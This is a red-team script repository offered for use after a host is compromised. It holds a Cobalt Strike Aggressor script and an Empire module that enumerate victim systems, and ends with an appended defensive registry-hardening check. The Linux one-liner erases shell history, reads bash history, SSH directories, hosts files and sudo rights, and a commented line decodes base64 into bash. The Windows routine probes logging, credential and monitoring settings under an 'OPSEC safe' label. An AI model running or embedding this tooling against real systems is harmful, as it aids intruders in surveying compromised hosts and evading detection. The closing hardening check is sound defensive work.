├── .gitignore
├── HostEnum.ps1
├── LICENSE
├── README.md
├── enumerate.cna
└── hostenum.py

/.gitignore:
--------------------------------------------------------------------------------
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class

# C extensions
*.so

# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
*.html

# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec

# Installer logs
pip-log.txt
pip-delete-this-directory.txt

# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
.hypothesis/

# Translations
*.mo
*.pot

# Django stuff:
*.log
local_settings.py

# Flask stuff:
instance/
.webassets-cache

# Scrapy stuff:
.scrapy

# Sphinx documentation
docs/_build/

# PyBuilder
target/

# IPython Notebook
.ipynb_checkpoints

# pyenv
.python-version

# celery beat schedule file
celerybeat-schedule

# dotenv
.env

# virtualenv
venv/
ENV/

# Spyder project settings
.spyderproject

# Rope project settings
.ropeproject

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2024 Threat Express

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Red Team Scripts
---
Red Team Scripts is a collection of red teaming related tools, scripts, techniques, and notes developed or discovered over time during engagements.
Related tool release blog posts can be found at [Threat Express](http://threatexpress.com), an information security and red teaming blog.

## Situational Awareness

**Perform situational awareness on a local host or domain upon initial compromise.**

### `enumerate.cna`

Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands (i.e. no PowerShell, binary calls, or process injection). Additionally, adds a basic `enumerate` alias for Linux based systems in SSH sessions.


### `Invoke-HostEnum`

**Author:** Andrew Chiles (@andrewchiles) with code by harmj0y, Joe Bialek, rvrsh3ll, Beau Bullock, Tim Medin

A PowerShell v2.0 compatible script comprised of multiple system enumeration / situational awareness techniques collected over time. If the system is a member of a Windows domain, it can also perform limited domain enumeration with the -Domain switch. However, domain enumeration is significantly limited, with the intention that PowerView or BloodHound could also be used.

**Enumerated Information:**

- OS Details, Hostname, Uptime, Install date
- Installed Applications and Patches
- Network Adapter Configuration, Network Shares, Connections, Routing Table, DNS Cache
- Running Processes and Installed Services
- Interesting Registry Entries
- Local Users, Groups, Administrators
- Personal Security Product Status
- Interesting file locations and keyword searches via file indexing
- Interesting Windows Logs (User logins)
- Basic Domain enumeration (users, groups, trusts, domain controllers, account policy, SPNs)

**Privilege Escalation**

Optionally performs Privilege Escalation functions from PowerUp in the PowerSploit project.

**Empire 2.0 Integration**

Use the accompanying hostenum.py script to include Invoke-HostEnum as a post-exploitation situational awareness module in Empire. Both files need to be copied to the appropriate locations in Empire.

**Credits:**

Several functions are inspired by or pulled directly from the following projects and are referenced in the code where applicable:

- [Invoke-HostRecon](https://raw.githubusercontent.com/dafthack/HostRecon/master/HostRecon.ps1) by Beau Bullock
- [Get-ComputerDetails](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Get-ComputerDetails.ps1) from Joe Bialek in PowerSploit
- [Get-BrowserInformation](https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Get-BrowserData.ps1) by rvrsh3ll
- [Get-UserSPNS](https://github.com/nidem/kerberoast) by Tim Medin
- [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) by @harmj0y

## Usage

Refer to the help and comments in each script for detailed usage information.

## License

This project and all individual scripts are under the BSD 3-Clause license.

## Links

[threatexpress.com](http://threatexpress.com)
http://threatexpress.com/blogs/2018/hostenum-updates-usage/
http://threatexpress.com/blogs/2017/invoke-hostenum/

--------------------------------------------------------------------------------
/enumerate.cna:
--------------------------------------------------------------------------------
# Aggressor automated Windows Host Profiling using Beacon's built-in commands
# @andrewchiles
# https://github.com/threatexpress/red-team-scripts
# References:
# https://gist.github.com/HarmJ0y/fe676e3ceba74f22a28bd1b121182db7
# https://github.com/leechristensen/Random/blob/master/PowerShellScripts/Get-HostProfile.ps1
# https://github.com/threatexpress/red-team-scripts/blob/master/HostEnum.ps1
# Load enumerate.cna into Cobalt Strike and issue the `enumerate` command on a Beacon or SSH session

sub enumerate_windows {
    $username = beacon_info($1,"user");

    bpwd($1);
    bdrives($1);
    bps($1);

    # Local File Locations
    bls($1,"C:\\");
    bls($1,"C:\\Program Files");
    bls($1,"C:\\Program Files \(x86\)");
    bls($1,"C:\\ProgramData");
    bls($1,"C:\\Users\\".$username."\\Documents");
    bls($1,"C:\\Users\\".$username."\\Desktop");
    bls($1,"C:\\Users\\".$username."\\Downloads");
    bls($1,"C:\\Users\\".$username."\\AppData\\Roaming");
    bls($1,"C:\\Users\\".$username."\\AppData\\Local");
    bls($1,"C:\\Users\\".$username."\\AppData\\Roaming\\Microsoft\\Windows\\Recent");

    # .NET CLR Installed Versions
    bls($1,"C:\\Windows\\Microsoft.Net\\Framework");

    # .NET CLR 2.0 installed
    #bls($1,"C:\\Windows\\Microsoft.Net\\Framework\\v2.0.50727");

    # .NET CLR 4.0 installed
    #bls($1,"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319");

    # Potential Mapped Drives
    bls($1,"E:\\");
    bls($1,"F:\\");
    bls($1,"G:\\");
    bls($1,"Z:\\");

    # Operating System
    breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "ProductName", "x64");
    breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "CurrentVersion", "x64");
    breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "CurrentBuild", "x64");
    breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "RegisteredOrganization", "x64");
    breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "RegisteredOwner", "x64");

    # System Hardware/BIOS
    breg_query($1, "HKLM\\HARDWARE\\DESCRIPTION\\System", "x64");
    breg_query($1, "HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS", "x64");

    # System Policies
    breg_query($1, "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies", "x64");
    breg_query($1, "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "x64");
    breg_query($1, "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit", "x64");
    breg_query($1, "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", "x64");

    # Powershell Version 2
    breg_query($1, "HKLM\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "x64");

    # Powershell Version 5
    breg_query($1, "HKLM\\Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", "x64");

    # Powershell Logging
    breg_query($1, "HKLM\\Software\\Policies\\Microsoft\\Windows\\Powershell", "x64");
    breg_query($1, "HKLM\\Software\\Policies\\Microsoft\\Windows\\Powershell\\Transcription", "x64");
    breg_query($1, "HKLM\\Software\\Policies\\Microsoft\\Windows\\Powershell\\ScriptBlockLogging", "x64");
    breg_query($1, "HKLM\\Software\\Policies\\Microsoft\\Windows\\Powershell\\ModuleLogging", "x64");

    # Recently Typed Commands and URLS
    breg_query($1, "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU", "x64");
    breg_query($1, "HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs", "x64");

    # Installed Software
    breg_query($1, "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "x86");
    breg_query($1, "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "x64");

    # Installed Services
    breg_query($1, "HKLM\\SYSTEM\\CurrentControlSet\\Services","x64");

    # Mapped Drives
    breg_query($1, "HKCU\\Network", "x64");
    breg_query($1, "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2", "x64");

    # Environment Variables
    breg_query($1, "HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "x64");
    breg_query($1, "HKCU\\Environment", "x64");

    # Internet Explorer Proxy Settings
    breg_query($1,"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings");
    breg_query($1,"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings");
    breg_query($1,"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections");

    # Firewall Profiles
    breg_query($1,"HKLM\\System\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile", "x64");
    breg_query($1,"HKLM\\System\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile", "x64");
    breg_query($1,"HKLM\\System\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile", "x64");

    # LSA Settings
    breg_query($1, "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa", "x64");
    breg_query($1, "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "x64");

    # Secure Boot
    breg_query($1, "HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecureBoot\\State", "x64");

    # LAPS Admin Password Management
    breg_query($1, "HKLM\\Software\\Policies\\Microsoft Services\\AdmPwd", "x64");

    # Windows Installer
    breg_query($1, "HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer", "x64");
    breg_query($1, "HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer", "x64");

    # Event Log Forwarding
    breg_query($1, "HKLM\\Software\\Policies\\Microsoft\\Windows\\EventLog\\EventForwarding\\SubscriptionManager", "x64");

    # Winlogon (AutoLogon, AutoLogin, ScreenSaverGrace)
    breg_query($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "x64");

    # Windows Update
    breg_query($1, "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "x64");
    breg_query($1, "HKLM\\SOFTWARE\\Microsoft\\CCMSetup", "x64");
    breg_query($1, "HKLM\\SOFTWARE\\Microsoft\\SMS\\Mobile Client", "x64");

    # LANMAN
    breg_query($1, "HKLM\\System\\CurrentControlSet\\Services\\LanManServer\\Parameters", "x64");
    breg_query($1, "HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\DefaultSecurity", "x64");

    # Wdigest
    breg_query($1, "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest", "x64");

    # Kerberos
    breg_query($1, "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Kerberos\\Parameters", "x64");

    # Service Group Order
    breg_query($1, "HKLM\\SYSTEM\\CurrentControlSet\\Control\\ServiceGroupOrder\\Security", "x64");

    # Software Specific
    # Putty
    breg_query($1, "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions", "x64");
    breg_query($1, "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions", "x86");

    # Sysmon
    breg_query($1, "HKLM\\SYSTEM\\CurrentControlSet\\Services\\SysmonDrv\\Parameters", "x64");
    breg_queryv($1, "HKLM\\SYSTEM\\CurrentControlSet\\Services\\SysmonDrv\\Parameters", "Rules", "x64");

}

sub enumerate_linux {
    # Bash one-liner for host enumeration
    local('$commands');
    local('$encoded');

    $commands = " unset HISTFILE HISTFILESIZE HISTSIZE;hostname;w;uname -a;date;date -u;cat /etc/*-release;env;lastlog 2>/dev/null;ls -al /home ~ ~/.ssh /tmp /dev/shm;df -h;mount;sudo -l;cat ~/.bash_history ~/.known_hosts /etc/hosts /etc/resolv.conf;ifconfig -a; ps aux; netstat -pantl";

    # Alternative: ship the command list base64-encoded and decode it on the target
    #$encoded = "echo " . base64_encode($commands) . "|base64 -d|bash";
    #binput($1, "\c0Executing the following commands: " . $commands);
    #bshell($1, $encoded);

    bshell($1, $commands);

}

beacon_command_register(
    "enumerate",
    "Perform OPSEC safe host enumeration with built-in commands",
    "Use: enumerate\n\nPerform Windows host enumeration with OPSEC safe techniques.");

alias enumerate {
    btask($1, "\c0Performing Windows host enumeration! (OPSEC Safe)", "T1082");
    enumerate_windows($1);

}

##############
# SSH Alias
##############

ssh_command_register(
    "enumerate",
    "Perform OPSEC safe host enumeration with built-in commands",
    "Use: enumerate\n\nPerform Linux host enumeration with OPSEC safe techniques.");

ssh_alias enumerate {
    btask($1, "\c0Performing Linux host enumeration! (OPSEC Safe)", "T1082");
    enumerate_linux($1);
}

--------------------------------------------------------------------------------
/hostenum.py:
--------------------------------------------------------------------------------
# Empire 2.x module definition. Empire 2.x runs on Python 2, hence the
# print statement and dict.iteritems() below.
from lib.common import helpers

class Module:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'HostEnum',

            'Author': ['@andrewchiles'],

            'Description': ('Performs detailed enumeration of the local system in the current user context. '
                            'Optionally performs Privesc checks and basic Windows Domain enumeration.'),

            'Background' : True,

            'OutputExtension' : None,

            'NeedsAdmin' : False,

            'OpsecSafe' : True,

            'Language': 'powershell',

            'MinLanguageVersion': '2',

            'Comments': [
                'https://github.com/threatexpress/red-team-scripts'
            ]
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            },
            'Local' : {
                'Description' : 'Perform local Windows enumeration functions.',
                'Required' : False,
                'Value' : ''
            },
            'Domain' : {
                'Description' : 'Perform additional Windows Domain enumeration functions.',
                'Required' : False,
                'Value' : ''
            },
            'Privesc' : {
                'Description' : 'Perform additional privilege escalation checks (PowerUp).',
                'Required' : False,
                'Value' : ''
            },
            'Quick' : {
                'Description' : 'Perform a quick system survey.',
                'Required' : False,
                'Value' : ''
            },
            'HTMLReport' : {
                'Description' : ('Create an HTML formatted report in current directory. '
                                 'Output filename convention is YYYYMMDD_HHMMSS_HOSTNAME.html'),
                'Required' : False,
                'Value' : ''
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value


    def generate(self):

        # read in the common module source code
        moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/HostEnum.ps1"

        try:
            f = open(moduleSource, 'r')
        except:
            print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
            return ""

        moduleCode = f.read()
        f.close()

        script = moduleCode

        script += "Invoke-HostEnum "

        # add any arguments to the end execution of the script
        for option,values in self.options.iteritems():
            if option.lower() != "agent":
                if values['Value'] and values['Value'] != '':
                    if values['Value'].lower() == "true":
                        # if we're just adding a switch
                        script += " -" + str(option)
                    else:
                        script += " -" + str(option) + " " + str(values['Value'])

        return script

--------------------------------------------------------------------------------
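The registry locations that `enumerate_windows` walks in enumerate.cna (PowerShell logging, WDigest, LSA, Secure Boot, LAPS, LanmanServer, Sysmon, event forwarding) are, read from the defender's side, a hardening checklist. As an added example that is not code from the red-team-scripts project, the PowerShell below reads those same keys on a host and flags the settings an enumerating Beacon would find missing; the value names and expected values are assumptions drawn from common hardening baselines, not from the page.

```powershell
# Added, defender-side example; not part of the red-team-scripts project.
# Reads the registry locations enumerate.cna queries and reports which
# hardening settings are absent or weak. Expected values are assumptions
# taken from common baselines. Run on the host being audited.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Returns $null when either the key or the named value does not exist
    try   { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Test-HostHardening {
    $pol = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows'
    $ccs = 'HKLM:\SYSTEM\CurrentControlSet'
    $checks = @(
        @{ Area = 'PowerShell script block logging'; Path = "$pol\PowerShell\ScriptBlockLogging"; Name = 'EnableScriptBlockLogging'; Expect = 1 }
        @{ Area = 'PowerShell module logging';       Path = "$pol\PowerShell\ModuleLogging";      Name = 'EnableModuleLogging';      Expect = 1 }
        @{ Area = 'PowerShell transcription';        Path = "$pol\PowerShell\Transcription";      Name = 'EnableTranscripting';      Expect = 1 }
        @{ Area = 'WDigest plaintext caching off';   Path = "$ccs\Control\SecurityProviders\WDigest"; Name = 'UseLogonCredential'; Expect = 0 }
        @{ Area = 'LSA runs as protected process';   Path = "$ccs\Control\Lsa";                   Name = 'RunAsPPL';                 Expect = 1 }
        @{ Area = 'SMB server signing required';     Path = "$ccs\Services\LanmanServer\Parameters"; Name = 'RequireSecuritySignature'; Expect = 1 }
        @{ Area = 'Secure Boot';                     Path = "$ccs\Control\SecureBoot\State";      Name = 'UEFISecureBootEnabled';    Expect = 1 }
        @{ Area = 'LAPS enabled';                    Path = 'HKLM:\SOFTWARE\Policies\Microsoft Services\AdmPwd'; Name = 'AdmPwdEnabled'; Expect = 1 }
    )
    foreach ($c in $checks) {
        $actual = Get-RegValue -Path $c.Path -Name $c.Name
        [pscustomobject]@{
            Area     = $c.Area
            Setting  = $c.Name
            Expected = $c.Expect
            Actual   = if ($null -eq $actual) { '<absent>' } else { $actual }
            # An absent value never equals the expectation, so it is flagged too
            Status   = if ($actual -eq $c.Expect) { 'OK' } else { 'REVIEW' }
        }
    }
    # Presence-only checks: enumerate.cna looks for these keys to learn
    # whether Sysmon and Windows Event Forwarding are in place.
    $presence = @(
        @{ Area = 'Sysmon driver configured'; Path = "$ccs\Services\SysmonDrv\Parameters" }
        @{ Area = 'WEF subscription manager'; Path = "$pol\EventLog\EventForwarding\SubscriptionManager" }
    )
    foreach ($p in $presence) {
        $present = Test-Path -Path $p.Path
        [pscustomobject]@{
            Area = $p.Area; Setting = '(key present)'; Expected = 'yes'
            Actual = if ($present) { 'yes' } else { 'no' }
            Status = if ($present) { 'OK' } else { 'REVIEW' }
        }
    }
}

Test-HostHardening | Format-Table -AutoSize
```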